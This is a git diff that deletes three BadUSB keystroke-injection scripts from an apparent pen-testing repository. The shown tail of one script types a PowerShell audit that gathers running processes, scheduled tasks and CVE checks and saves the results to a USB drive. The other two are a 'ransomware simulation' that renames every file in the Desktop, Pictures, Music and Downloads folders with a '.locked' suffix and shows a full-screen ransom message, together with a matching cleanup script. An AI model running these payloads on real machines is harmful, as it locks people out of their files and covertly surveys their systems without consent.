-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-windowsoptionalfeature -online -featurename smb1protocol
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking SMBv1 status: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-antivirusstatus {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-mpcomputerstatus
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking antivirus status: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING check-passwordpolicy >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING audit-services >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-networksettings >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-softwarevulnerabilities >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING analyze-logs >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-openports >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-missingupdates >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-firewallstatus >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-smbv1status >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING check-antivirusstatus >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-REM Dynamically identify critical software from running processes and scheduled tasks
-STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
-DELAY 200
-ENTER
-DELAY 200
-STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
-DELAY 200
-ENTER
-DELAY 200
-REM Combine running software and scheduled tasks
-STRING $softwareList = @()
-DELAY 200
-ENTER
-DELAY 200
-STRING foreach ($process in $runningSoftware) {
-DELAY 200
-ENTER
-DELAY 200
-STRING $softwareList += $process.Name
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING foreach ($task in $scheduledTasks) {
-DELAY 200
-ENTER
-DELAY 200
-STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-REM Remove duplicates and empty entries
-STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
-DELAY 200
-ENTER
-DELAY 200
-REM Check CVEs for identified software
-STRING foreach ($software in $softwareList) {
-DELAY 200
-ENTER
-DELAY 200
-STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($version) {
-DELAY 200
-ENTER
-DELAY 200
-STRING check-cve -productname $software -version $version >> $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
-DELAY 200
-ENTER
-DELAY 200
-STRING start-sleep -seconds $initialDelay
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Results saved to USB drive."
-DELAY 200
-ENTER
-DELAY 200
-STRING } else {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error: USB drive MYUSB not found."
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING invoke-command -scriptblock $script
-DELAY 200
-ENTER
-DELAY 20000
-REM check out github.com/markcyber for more badusb/pen testing scripts and tools
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
deleted file mode 100644
index 3be26299..00000000
--- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
+++ /dev/null
@@ -1,62 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-GUI r
-DELAY 2000
-STRING powershell
-ENTER
-REM increased delays to make sure each command can go through even on slower computers
-DELAY 6000
-REM Define the locations using correct SpecialFolder enumerations
-STRING $folders = @(
-DELAY 1000
-ENTER
-DELAY 1000
-STRING [System.Environment+SpecialFolder]::Desktop,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::MyPictures,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::MyMusic,
-DELAY 1000
-ENTER
-DELAY 2000
-STRING [System.Environment+SpecialFolder]::Downloads
-DELAY 1000
-ENTER
-DELAY 2000
-STRING )
-DELAY 1000
-ENTER
-DELAY 3000
-REM Iterate over each location
-STRING foreach ($folder in $folders) {
-DELAY 1000
-ENTER
-DELAY 1000
-STRING $path = [Environment]::GetFolderPath($folder)
-DELAY 1000
-ENTER
-DELAY 4000
-REM Get all .locked files in the path and rename them back
-STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') }
-DELAY 2000
-ENTER
-DELAY 5000
-STRING }
-DELAY 1000
-ENTER
-DELAY 4000
-STRING exit
-DELAY 1000
-ENTER
-REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
deleted file mode 100644
index b35bd533..00000000
--- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
+++ /dev/null
@@ -1,91 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-GUI r
-DELAY 1000
-REM opens powershell (this is for windows machines)
-STRING powershell
-ENTER
-DELAY 3000
-REM Define the locations using correct SpecialFolder enumerations
-STRING $folders = @(
-DELAY 500
-ENTER
-DELAY 500
-STRING [System.Environment+SpecialFolder]::Desktop,
-DELAY 500
-ENTER
-DELAY 500
-STRING [System.Environment+SpecialFolder]::MyPictures,
-DELAY 500
-ENTER
-DELAY 500
-STRING [System.Environment+SpecialFolder]::MyMusic,
-DELAY 500
-ENTER
-DELAY 500
-STRING [System.Environment+SpecialFolder]::Downloads
-DELAY 500
-ENTER
-DELAY 500
-STRING )
-DELAY 500
-ENTER
-DELAY 500
-REM Iterate over each location
-STRING foreach ($folder in $folders) {
-DELAY 500
-ENTER
-DELAY 500
-STRING $path = [Environment]::GetFolderPath($folder)
-DELAY 500
-ENTER
-DELAY 500
-REM Get all files in the path and rename them
-STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
-DELAY 500
-ENTER
-DELAY 500
-STRING }
-DELAY 500
-ENTER
-DELAY 2000
-REM Display ransomware message
-STRING Add-Type -AssemblyName PresentationFramework
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window = New-Object System.Windows.Window
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.WindowStartupLocation = 'CenterScreen'
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.WindowState = 'Maximized'
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.Topmost = $true
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
-DELAY 500
-ENTER
-DELAY 500
-STRING $Window.ShowDialog()
-DELAY 500
-ENTER
-DELAY 2000
-STRING exit
-DELAY 500
-ENTER
-REM check out my github at github.com/markcyber for more badusb & hacking type tools